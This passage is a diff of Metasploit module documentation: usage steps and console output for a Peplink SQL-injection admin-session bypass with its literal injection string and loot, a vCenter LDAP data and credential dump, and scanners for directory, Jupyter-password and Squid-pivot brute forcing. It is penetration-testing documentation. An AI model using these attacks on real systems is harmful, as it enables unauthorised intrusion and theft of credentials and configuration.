+[*] There are 2 (possibly expired) sessions
+[*] Trying the ids from the most recent login
+[+] Found cookie wPJLPS6lqt8Ushwz1tlmz5tRbvI1ybwWRaBx2GRi3Qcu8, username = user, with read-only permissions
+[+] Found cookie aLvFyqho3JYoYSc7EROYWU5A7c4pz9IwV66mvnIzYwMPr, username = admin, with read/write permissions
+[*] Checking for admin cookie : wPJLPS6lqt8Ushwz1tlmz5tRbvI1ybwWRaBx2GRi3Qcu8
+[*] Checking for admin cookie : aLvFyqho3JYoYSc7EROYWU5A7c4pz9IwV66mvnIzYwMPr
+
+... <as above, gathering of data>
+
+[*] Auxiliary module execution completed
+msf5 auxiliary(sqli/peplink_bauth_sqli) > 
+```
+
+Verbose:
+
+When you enable verbose, you get the parsed XML document displayed.
+
+```
+msf5 auxiliary(gather/peplink_bauth_sqli) > set Verbose true
+msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true
+msf5 auxiliary(gather/peplink_bauth_sqli) > run
+[*] Running module against 192.168.1.254
+
+[+] Target seems to be vulnerable
+[*] Checking for admin cookie : ' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')--
+[+] Retrieved config, saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkconfigur_780974.bin
+[*] Retrieving fhlicense_info
+[+]     data
+[+]             license
+[+]                     bandwidth
+[+]                             0
+[+]                     sessions
+[+]                             0
+[+]                     err_desc
+[+]                             Virtual machine server changed.
+[+]                     force_lic_page
+[+]                             1
+[+]                     activated
+[+]                             0
+[+]                     vm_server_address
+[+]                     expired
+[+]                             0
+[+]                     license_type
+[+]                             Invalid
+[+]                     expiry_date
+[+]                             2021-08-02
+[+]                     sn
+[+]                             1135-E8A0-DD29
+[+]                     license_key
+[+]                             YCB7EAN54FAEMTDF
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfhlicens_867800.txt
+[*] Retrieving sysinfo
+[+]     data
+[+]             sysinfo
+[+]                     legal
+[+]                     company
+[+]                             Peplink
+[+]                     mvpn_version
+[+]                             5.0.0
+[+]                     version
+[+]                             6.3.2 build 1424
+[+]                     serial
+[+]                             1135-E8A0-DD29
+[+]                     product_code
+[+]                     hardware_revision
+[+]                             1
+[+]                     desc_support
+[+]                     product_name
+[+]                             Peplink FusionHub
+[+]                     name
+[+]                             1135-E8A0-DD29
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinksysinfo_739792.txt
+[*] Retrieving macinfo
+[+]     data
+[+]             macinfo
+[+]                     port {id=0}
+[+]                             mac
+[+]                                     08:00:27:52:8b:fc
+[+]                             name
+[+]                                     WAN 
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkmacinfo_307720.txt
+[*] Retrieving hostnameinfo
+[+]     data
+[+]             hostname_info
+[+]                     hostname
+[+]                             1135-e8a0-dd29
+
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkhostname_534719.txt
+[*] Retrieving uptime
+[+]     data
+[+]             subscription_mode
+[+]             systime
+[+]                     Sun Aug 02 14:31:21 CET 2020
+[+]             uptime
+[+]                     elapsed
+[+]                             2986
+[+]                     info
+[+]                             0 days 0 hours 49 minutes
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkuptime_233915.txt
+[*] Retrieving client_info
+[+]     data
+[+]             client_status
+[+]                     reserved_mac
+[+]                     client_list
+[+]                             client {type=0}
+[+]                                     rate_down
+[+]                                             0
+[+]                                     rate_up
+[+]                                             0
+[+]                                     active
+[+]                                     mac
+[+]                                             10:08:B1:CC:97:41
+[+]                                     ip {id=0}
+[+]                                             192.168.1.222
+[+]                                     ipn
+[+]                                             3232235998
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkclient_i_419158.txt
+[*] Retrieving hubport
+[+]     data
+[+]             port {id=wan}
+[+]                     mvpn_advertise_wan_network
+[+]                     tcpmss
+[+]                     mtu
+[+]                             1440
+[+]                     pppoe_sn
+[+]                     pppoe_password
+[+]                     pppoe_user
+[+]                     dns_custom_servers
+[+]                             8.8.8.8 1.1.1.1
+[+]                     dns_auto
+[+]                     dhcp_hostname
+[+]                     dhcp_client_id
+[+]                     mvpn_default_to_lan
+[+]                     gateway
+[+]                             192.168.1.1
+[+]                     netmask
+[+]                             255.255.255.0
+[+]                     ipaddr
+[+]                             192.168.1.254
+[+]                     bridge_mvpn
+[+]                     bridge_mode
+[+]                     conn_method
+[+]                             static
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkhubport_064122.txt
+[*] Retrieving fhstroute
+[+]     data
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfhstrout_739377.txt
+[*] Retrieving ipsec
+[+]     data
+[+]             ipsec
+[+]                     order
+[+]                     nat
+[+]             linkinfo
+[+]                     link {id=1}
+[+]                             port {id=1}
+[+]                                     port_name
+[+]                                             WAN
+[+]                                     port_type
+[+]                                             ethernet
+[+]                                     actiavted
+[+]                             name
+[+]                                     WAN
+[+]                             enable
+[+]                     order
+[+]                             1
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkipsec_320666.txt
+[*] Retrieving wan_summary
+[+]     data
+[+]             connection_info
+[+]                     conn {id=1}
+[+]                             conn_method
+[+]                                     method
+[+]                                             dhcp
+[+]                             modem_idle
+[+]                                     timeout
+[+]                                             180
+[+]                             backup_group
+[+]                                     0
+[+]                             mvpn_nat
+[+]                             nat
+[+]                             enable
+[+]                             port_id
+[+]                                     1
+[+]                             name
+[+]                                     WAN
+[+]                     order
+[+]                             1
+[+]             physical_info
+[+]                     port {id=1}
+[+]                             ethernet_info
+[+]                                     simulated_mac
+[+]                                     default_mac
+[+]                                     mac_clone
+[+]                                     mtu
+[+]                                     advertise
+[+]                                     speed
+[+]                             port_name
+[+]                                     WAN 
+[+]                             type
+[+]                                     ethernet
+[+]                             activated
+[+]                                     yes
+[+]                     count
+[+]                             1
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkwan_summ_918579.txt
+[*] Retrieving firewall
+[+]     data
+[+]             firewall_ids
+[+]             firewall_mvpn
+[+]             private_firewall
+[+]                     default
+[+]                             accept
+[+]             outbound_firewall
+[+]                     default
+[+]                             accept
+[+]             inbound_firewall
+[+]                     default
+[+]                             accept
+[+]             linkinfo
+[+]                     link {id=1}
+[+]                             port {id=1}
+[+]                                     port_name
+[+]                                             WAN
+[+]                                     port_type
+[+]                                             ethernet
+[+]                                     actiavted
+[+]                             name
+[+]                                     WAN
+[+]                             enable
+[+]                     order
+[+]                             1
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfirewall_758402.txt
+[*] Retrieving cert_info
+[+]     data
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkcert_inf_603637.txt
+[*] Retrieving mvpn_summary
+[+]     data
+[+]             mvpn
+[+]                     order
+[+]                     mvpn_nat_mode_dhcp_server
+[+]                             has_nat_profile
+[+]                                     0
+[+]                             nat_remote
+[+]                                     0
+[+]                             subnet_mask
+[+]                                     24
+[+]                             pool_end
+[+]                                     169.254.131.254
+[+]                             pool_start
+[+]                                     169.254.131.1
+[+]                             enable
+[+]                                     1
+[+]                     restrict_advertise
+[+]                             no
+[+]                     hc_mode
+[+]                             0
+[+]                     rn
+[+]                             1135-E8A0-DD29
+[+]                     site_id
+[+]                             333
+[+]                     l2vpn
+[+]                             wanport_supported
+[+]                                     false
+[+]                             wanport_name
+[+]                                     WAN Port Unavailable
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkmvpn_sum_970830.txt
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/peplink_bauth_sqli) > 
+```
+
+Loot:
+
+```
+msf5 auxiliary(gather/peplink_bauth_sqli) > loot
+
+Loot
+====
+
+host           service  type                          name  content             info  path
+----           -------  ----                          ----  -------             ----  ----
+192.168.1.254           peplink configuration tar gz        application/binary        /home/redouane/.msf4/loot/20200802153714_default_192.168.1.254_peplinkconfigur_157106.bin
+192.168.1.254           peplink fhlicense_info              text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfhlicens_326973.txt
+192.168.1.254           peplink sysinfo                     text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinksysinfo_385353.txt
+192.168.1.254           peplink macinfo                     text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkmacinfo_525407.txt
+192.168.1.254           peplink hostnameinfo                text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkhostname_613045.txt
+192.168.1.254           peplink uptime                      text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkuptime_488261.txt
+192.168.1.254           peplink client_info                 text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkclient_i_529454.txt
+192.168.1.254           peplink hubport                     text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkhubport_938262.txt
+192.168.1.254           peplink fhstroute                   text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfhstrout_737113.txt
+192.168.1.254           peplink ipsec                       text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkipsec_055562.txt
+192.168.1.254           peplink wan_summary                 text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkwan_summ_957693.txt
+192.168.1.254           peplink firewall                    text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfirewall_777226.txt
+192.168.1.254           peplink cert_info                   text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkcert_inf_765605.txt
+192.168.1.254           peplink mvpn_summary                text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkmvpn_sum_890141.txt
+
+msf5 auxiliary(gather/peplink_bauth_sqli) > 
+
+```
@@ -4,7 +4,8 @@

 This module uses an anonymous-bind LDAP connection to dump data from
 the vmdir service in VMware vCenter Server version 6.7 prior to the
-6.7U3f update.
+6.7U3f update, only if upgraded from a previous release line, such as
+6.0 or 6.5.

 ### Setup

@@ -27,11 +28,6 @@ Dump all LDAP data from the vCenter Server.

 If you already have the LDAP base DN, you may set it in this option.

-### ConnectTimeout
-
-You may configure the timeout for LDAP connects if necessary. The
-default is 10.0 seconds and should be more than sufficient.
-
 ## Scenarios

 ### VMware vCenter Server 6.7 virtual appliance on ESXi
@@ -46,7 +42,8 @@ Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
   ----     ---------------  --------  -----------
   BASE_DN                   no        LDAP base DN if you already have it
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT    389              yes       The target port
+   RPORT    636              yes       The target port
+   SSL      true             no        Enable SSL on the LDAP connection


 Auxiliary action:
@@ -60,6 +57,7 @@ msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted]
 rhosts => [redacted]
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
 [*] Running module against [redacted]
+not verifying SSL hostname of LDAPS server '[redacted]:636'

 [*] Discovering base DN automatically
 [*] Searching root DSE for base DN
@@ -74,19 +72,11 @@ supportedldapversion: 3
 supportedsaslmechanisms: GSSAPI

 [+] Discovered base DN: dc=vsphere,dc=local
-[*] Dumping LDAP data from vmdir service at [redacted]:389
-[+] [redacted]:389 is vulnerable to CVE-2020-3952
+[*] Dumping LDAP data from vmdir service at [redacted]:636
+[+] [redacted]:636 is vulnerable to CVE-2020-3952
 [*] Storing LDAP data in loot
 [+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002613_default_[redacted]_VMwarevCenterS_939568.txt
 [*] Password and lockout policy:
-dn: cn=password and lockout policy,dc=vsphere,dc=local
-cn: password and lockout policy
-enabled: TRUE
-ntsecuritydescriptor:: [redacted]
-objectclass: top
-objectclass: vmwLockoutPolicy
-objectclass: vmwPasswordPolicy
-objectclass: vmwPolicy
 vmwpasswordchangeautounlockintervalsec: [redacted]
 vmwpasswordchangefailedattemptintervalsec: [redacted]
 vmwpasswordchangemaxfailedattempts: [redacted]
@@ -101,6 +91,8 @@ vmwpasswordminspecialcharcount: [redacted]
 vmwpasswordminuppercasecount: [redacted]
 vmwpasswordprohibitedpreviouscount: [redacted]

+[+] Credentials found: [redacted]
+[snip]
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) >
 ```
@@ -0,0 +1,129 @@
+## Vulnerable Application
+
+Web sites & other HTTP based applications may be vulnerable to directory brute forcing. This module executes a directory
+brute force on a web server, in order to discover locations on the web server for further analysis. This is not the same
+as using a word dictionary - this module uses string permutations instead.
+
+### Install
+
+Any web server that serves directories can be used. This module can support different authentication methods, which will
+depend on the type of web server used.
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. Do: `use auxiliary/scanner/http/brute_dirs`
+1. Do: `set rhosts [IPs]`
+1. Do: `run`
+1. As the module executes you should see a list of directories that are being served up by the web server.
+
+## Options
+
+### DELAY
+
+The delay between connections, per thread, in milliseconds. Using this will reduce the speed of the
+module, which may be useful to prevent any rate limiting or web application firewalls from preventing further scanning.
+Defaults to `0`.
+
+### FORMAT
+
+The comma separated list of expected directory formats used to determine the order of brute
+force attempts.
+Defaults to `a,aa,aaa`.
+
+Use the following format specifiers:
+
+|Format specifier|Character type|
+|---|---|
+|a  | lowercase alpha|
+|d  | digit|
+|A  | uppercase alpha|
+
+The default value will search `a,aa,aaa` will search for 1 character directories, then 2 character directories, then 3
+character directories.
+
+### JITTER
+
+The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. Using jitter ensures
+requests have a random amount of additional delay. This is also useful for evading brute force prevention.
+Defaults to `0`.
+
+### PATH
+
+The path to starting identification of directories from.
+Defaults to `/`.
+
+### THREADS
+
+The number of concurrent threads (max one per host).
+Defaults to `1`.
+
+### TIMEOUT
+
+The socket connect/read timeout in seconds.
+Defaults to `20`.
+
+### ErrorCode
+
+The expected HTTP code for non existent directories.
+Defaults to `404`.
+
+### HTTP404Sigs
+
+Path of 404 signatures to use to identify 'file not found' strings
+in website output, even if a successful HTTP Status Code is returned by the server.
+Defaults to `[Metasploit data directory]/wmap/wmap_404s.txt`.
+
+## Scenarios
+
+### HTTP directory brute force on a specific port
+
+Identify an open HTTP port on a target web server by using `nmap`:
+
+```
+nmap -p8080 192.168.2.3
+.
+.
+.
+PORT     STATE SERVICE
+8080/tcp   open  http
+
+```
+
+Configure the `brute_dirs` module to use the identified IP address and port number:
+
+```
+msf5 > use auxiliary/scanner/http/brute_dirs 
+msf5 auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.3
+msf5 auxiliary(scanner/http/brute_dirs) > set RPORT 8080
+RHOSTS => 192.168.2.3
+msf5 auxiliary(scanner/http/brute_dirs) > run
+
+[*] Using code '404' as not found.
+[+] Found http://192.168.2.3:8080/dav/ 200
+[+] Found http://192.168.2.3:8080/img/ 200
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Testing against multiple hosts using a CIDR
+
+```
+msf5 > use auxiliary/scanner/http/brute_dirs
+msf5 auxiliary(scanner/http/brute_dirs) > show options
+    ... show and set options ...
+msf5 auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.1/24
+msf5 auxiliary(scanner/http/brute_dirs) > run
+```
+
+### Custom format to find specifically formatted directories
+
+A format string of `Aaaaad` will search for 6 character directories, starting with a capital letter and ending in a
+digit. E.g.
+
+```
+msf5 > use auxiliary/scanner/http/brute_dirs 
+msf5 auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.3
+msf5 auxiliary(scanner/http/brute_dirs) > set FORMAT 'Aaaaad'
+msf5 auxiliary(scanner/http/brute_dirs) > run
+```
@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+This module detects vulnerable versions of FortiMail exploitable with an unauthenticated login bypass vulnerability.
+
+Tested against the following versions of FortiMail:
+- 5.4.9, 5.4.10, 5.4.11
+- 6.0.5, 6.0.6, 6.0.7, 6.0.8, 6.0.9
+- 6.2.1, 6.2.2, 6.2.3
+- 6.4.0
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use auxiliary/scanner/http/fortimail_login_bypass_detection`
+- [ ] `set RHOSTS <RHOSTS>`
+- [ ] `set VERBOSE true`
+- [ ] `run`
+- [ ] **Verify** that systems are detected accordingly
+
+## Scenarios
+
+```
+msf5 auxiliary(scanner/http/fortimail_login_bypass_detection) > run
+
+[*] Checking vulnerability at 172.16.144.198
+[+] 172.16.144.198 - Vulnerable version of FortiMail detected
+[*] Scanned 1 of 4 hosts (25% complete)
+[*] Checking vulnerability at 172.16.144.199
+[+] 172.16.144.199 - Vulnerable version of FortiMail detected
+[*] Scanned 2 of 4 hosts (50% complete)
+[*] Checking vulnerability at 172.16.144.200
+[+] 172.16.144.200 - Vulnerable version of FortiMail detected
+[*] Scanned 3 of 4 hosts (75% complete)
+[*] Checking vulnerability at 172.16.144.201
+[-] 172.16.144.201 - Not vulnerable version of FortiMail detected
+[*] Scanned 4 of 4 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,75 @@
+## Vulnerable Application
+
+This module checks if authentication is required on a Jupyter Lab or Notebook server. If it is, this module will
+bruteforce the password. Jupyter only requires a password to authenticate, usernames are not used. This module is
+compatible with versions 4.3.0 (released 2016-12-08) and newer. [Version 4.3.0][1] is the first version in which
+authentication is required by default.
+
+A note on names, "Jupyter Lab" is the next-generation interface for "Jupyter Notebooks" which was the successor of the
+original IPython Notebook system. This module is compatible with both standard Jupyter Notebook and Jupyter Lab servers.
+
+### Installation
+
+1. Install the latest version of Jupyter from PyPi using pip: `pip install notebook`. The "notebook" package is the core
+  application and is the one whose version number is used as the Jupyter version number referred to in this document.
+1. Start Jupyter using `jupyter notebook --ip='*'` to start Jupyter listening on all IP addresses.
+    * New installs will randomly generate an authentication token and open the browser with it
+    * As of [version 5.3][2], the user will be prompted to set a password the first time they open the UI
+    * Note that you may need to restart Jupyter after changing the password in order for Jupyter to start using the new password.
+    * If you can't reset the password, it may be because you need to create the directory `.jupyter` in the directory 
+    you are running the `jupyter notebook --ip='*'` command from.
+1. With the password set, the module can be tested
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/jupyter_login`
+1. Set the `RHOSTS` option
+    * With no other options set, this will only check if authentication is required
+1. Do: `run`
+1. You should the server version
+1. If password options (such as `PASS_FILE`) where specified, and the server requires authentication then you should see
+   login attempts
+
+## Options
+
+## Scenarios
+
+### Jupyter Notebook 4.3.0 With No Authentication Requirement
+
+```
+msf5 > use auxiliary/scanner/http/jupyter_login 
+msf5 auxiliary(scanner/http/jupyter_login) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf5 auxiliary(scanner/http/jupyter_login) > set PASS_FILE /tmp/passwords.txt
+PASS_FILE => /tmp/passwords.txt
+msf5 auxiliary(scanner/http/jupyter_login) > run
+
+[*] 192.168.159.128:8888 - The server responded that it is running Jupyter version: 4.3.0
+[+] 192.168.159.128:8888 - No password is required.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/jupyter_login) >
+```
+
+### Jupyter Notebook 6.0.2 With A Password Set
+
+```
+msf5 > use auxiliary/scanner/http/jupyter_login 
+msf5 auxiliary(scanner/http/jupyter_login) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf5 auxiliary(scanner/http/jupyter_login) > set PASS_FILE /tmp/passwords.txt
+PASS_FILE => /tmp/passwords.txt
+msf5 auxiliary(scanner/http/jupyter_login) > run
+
+[*] 192.168.159.128:8888 - The server responded that it is running Jupyter version: 6.0.2
+[-] 192.168.159.128:8888 - LOGIN FAILED: :Password (Incorrect)
+[+] 192.168.159.128:8888 - Login Successful: :Password1
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/jupyter_login) >
+```
+
+[1]: https://jupyter-notebook.readthedocs.io/en/stable/changelog.html#release-4-3
+[2]: https://jupyter-notebook.readthedocs.io/en/stable/public_server.html#automatic-password-setup
@@ -0,0 +1,33 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated directory traversal vulnerability which exists in Spring Cloud Config versions 2.2.x prior to 2.2.3 and 2.1.x prior to 2.1.9, and older unsupported versions. Spring Cloud Config listens by default on port 8888.
+
+**References:** https://tanzu.vmware.com/security/cve-2020-5410 <br>
+**Vulnerable Installation Guide:** https://github.com/osamahamad/CVE-2020-5410-POC/blob/master/README.md
+
+```
+docker run -it --name=spring-cloud-config-server \
+-p 8888:8888 \
+hyness/spring-cloud-config-server:2.1.6.RELEASE \
+--spring.cloud.config.server.git.uri=https://github.com/spring-cloud-samples/config-repo
+```
+
+## Verification Steps
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/springcloud_directory_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux
+
+```
+msf5 auxiliary(scanner/http/springcloud_directory_traversal) > run
+
+[+] File saved in: /Users/Dhiraj/.msf4/loot/20200619234552_default_[REDACTED]_springcloud.trav_785232.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/springcloud_directory_traversal) > 
+```
@@ -0,0 +1,283 @@
+## Description
+
+A exposed Squid proxy will usually allow an attacker to make requests on their behalf. If misconfigured, this may give the attacker information about devices that they cannot normally reach. For example, an attacker may be able to make requests for internal IP addresses against an open Squid proxy exposed to the Internet, therefore performing a port scan against the internal network.
+
+The `auxiliary/scanner/http/open_proxy` module can be used to test for open proxies, though a Squid proxy does not have to be on the open Internet in order to allow for pivoting (e.g. an Intranet Squid proxy which allows the attack to pivot to another part of the internal network).
+
+This module will not be able to scan network ranges or ports denied by Squid ACLs. Fortunately it is possible to detect whether a host was up and the port was closed, or if the request was blocked by an ACL, based on the response Squid gives. This feedback is provided to the user in meterpreter `VERBOSE` output, otherwise only open and permitted ports are printed.
+
+
+### Vulnerable Application Setup
+
+The [official Squid configuration documentation](https://wiki.squid-cache.org/SquidFaq/ConfiguringSquid) covers the significant flexibility of the Squid proxy. For this module, the most relevant core Squid configuration lines usually looks like this (default for version 3.5):
+
+```
+http_port 3128
+
+acl localnet src 10.0.0.0/8     # RFC1918 possible internal network
+acl localnet src 172.16.0.0/12  # RFC1918 possible internal network
+acl localnet src 192.168.0.0/16 # RFC1918 possible internal network
+acl localnet src fc00::/7       # RFC 4193 local private network range
+acl localnet src fe80::/10      # RFC 4291 link-local (directly plugged) machines
+
+acl SSL_ports port 443
+
+acl Safe_ports port 80          # http
+acl Safe_ports port 21          # ftp
+acl Safe_ports port 443         # https
+acl Safe_ports port 70          # gopher
+acl Safe_ports port 210         # wais
+acl Safe_ports port 280         # http-mgmt
+acl Safe_ports port 488         # gss-http
+acl Safe_ports port 591         # filemaker
+acl Safe_ports port 777         # multiling http
+acl Safe_ports port 1025-65535  # unregistered ports
+
+acl CONNECT method CONNECT
+
+http_access deny !Safe_ports
+http_access deny CONNECT !SSL_ports
+http_access allow localhost manager
+http_access deny manager
+
+#
+# INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS
+#
+
+http_access allow localnet
+http_access allow localhost
+http_access deny all
+```
+
+In short, this opens port 3128 for proxying from `localhost` or a `localnet` ranges to any port in `Safe_ports`, and allows SSL CONNECT requests to be made to `SSL_ports` (just 443 in this example).
+
+The references to "manager" are referring to a component of Squid which provides management controls and reports displaying statistics about the squid process as it runs, and can show useful information like file descriptors or internal hostnames and IP addresses if the ACL permits access. [See the official docs](https://wiki.squid-cache.org/Features/CacheManager) for more information on the Cache Manager.
+
+As such, you should be able to install Squid with default configuration, and reach through it from an internal network source range to anythin the Squid proxy has a route to. If you wish to test against other ports or network ranges, modify the configuration to suit prior to testing.
+
+
+## Verification Steps
+To test this module, you can try the following:
+
+1. Install Squid
+1. Start the Squid service
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/squid_pivot_scanning`
+1. Set the `RHOSTS` and `RPORT` to be that of Squid's host address and port:
+    1. `set RHOSTS squid.internal`
+    1. `set RPORT 3128`
+1. Set the `RANGE` parameter to be the destination host addresses you wish to port scan.
+    1. `set RANGE 192.168.0.1-192.168.0.2`
+1. (Optional) Set the specific `PORTS` parameter to any ports you wish to port scan on the hosts in `RANGE`.
+    1. `set PORTS 21-23,80,443`
+1. Do: `run`
+1. You should see the module attempt to connect to the proxy, and then first port of the first host in `RANGE`. Ports will be tested sequentially until the end of `PORTS` is reached, at which point it will start from the first port on the next host in `RANGE`.
+
+
+## Options
+Here is a quick overview of each option within the module.
+
+### CANARY_IP
+
+The IP to check if the proxy always answers positively - this IP address should not normally respond.
+
+Default value: `1.2.3.4`
+
+### MANUAL_CHECK
+
+Invoke the canary check, and stop the scan if the Squid proxy server appears to answer positively to every request.
+
+Default value: `true`
+
+### PORTS
+
+The destination TCP ports to scan through the proxy. Ports will be scanned in ascending order.
+
+Note: these must be TCP, this scanner cannot scan other protocols.
+
+### Proxies
+
+This option should not be confused with the Squid proxy you are trying to scan - this is one of the default Meterpreter paramets in which you can specify a proxy chain to use that you require to reach the Squid proxy.
+
+### RANGE
+
+This is the IP range you wish to sca through the Squid proxy. `PORTS` on these hosts will be scanned. Hosts are scanned in ascending order.
+
+### RPORT
+
+This is the port that the Squid proxy is listening on. Squid defaults to 3128.
+
+Default value: `3128`
+
+### SSL
+
+Whether you need to connect to Squid with SSL. This is not normally the case.
+
+Default value: `false`
+
+### THREADS
+
+The number of concurrent threads (max one per Squid host).
+
+Default value: `1`
+
+### VHOST
+
+HTTP server virtual host header to send on requests.
+
+
+## Scenarios and Examples
+The following is a brief demo of a port scan against two hosts (`192.168.0.1` and `192.168.0.2`) through a Squid proxy responding at `10.10.10.100:3128`. You could assume that the Squid host has a public or otherwise reachable IP address, where the `192.168.0.0` network range is not normally reachable to you.
+
+```
+msf6 > use auxiliary/scanner/http/squid_pivot_scanning
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RHOSTS 10.10.10.100
+RHOSTS => 10.10.10.100
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RPORT 3128
+RPORT => 3128
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21-25,79-81,139,443,445,1433,1521,1723,3389,8080,9100
+PORTS => 21-25,79-81,139,443,445,1433,1521,1723,3389,8080,9100
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 192.168.0.1-192.168.0.2
+RANGE => 192.168.0.1-192.168.0.2
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+[+] [10.10.10.100] 192.168.0.1 is alive.
+[+] [10.10.10.100] 192.168.0.1:80 seems open (HTTP 200, server header: 'nginx/1.14.0 (Ubuntu)').
+[+] [10.10.10.100] 192.168.0.2 is alive.
+[+] [10.10.10.100] 192.168.0.2:80 seems open (HTTP 302 redirect to: 'index.php', server header: 'nginx/1.14.0 (Ubuntu)')
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Setting the `VERBOSE` option will show each port tested and explain the reason for unreachable ports, if known. This can be helpful, as a port might very well be open and responding on a host, however if it is denied by the Squid ACL you will be unable to reach it regardless.
+
+```
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+[*] [10.10.10.100] Verifying manual testing is not required...
+[*] [10.10.10.100] Requesting 192.168.0.1:21
+[+] [10.10.10.100] 192.168.0.1 is alive.
+[*] [10.10.10.100] 192.168.0.1 is alive but 21 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:22
+[*] [10.10.10.100] 192.168.0.1:22 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:23
+[*] [10.10.10.100] 192.168.0.1:23 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:24
+[*] [10.10.10.100] 192.168.0.1:24 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:25
+[*] [10.10.10.100] 192.168.0.1:25 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:79
+[*] [10.10.10.100] 192.168.0.1:79 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:80
+[+] [10.10.10.100] 192.168.0.1:80 seems open (HTTP 200, server header: 'nginx/1.14.0 (Ubuntu)').
+[*] [10.10.10.100] Requesting 192.168.0.1:81
+[*] [10.10.10.100] 192.168.0.1:81 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:139
+[*] [10.10.10.100] 192.168.0.1:139 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:443
+[*] [10.10.10.100] 192.168.0.1 is alive but 443 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:445
+[*] [10.10.10.100] 192.168.0.1:445 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:1433
+[*] [10.10.10.100] 192.168.0.1 is alive but 1433 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:1521
+[*] [10.10.10.100] 192.168.0.1 is alive but 1521 is closed.
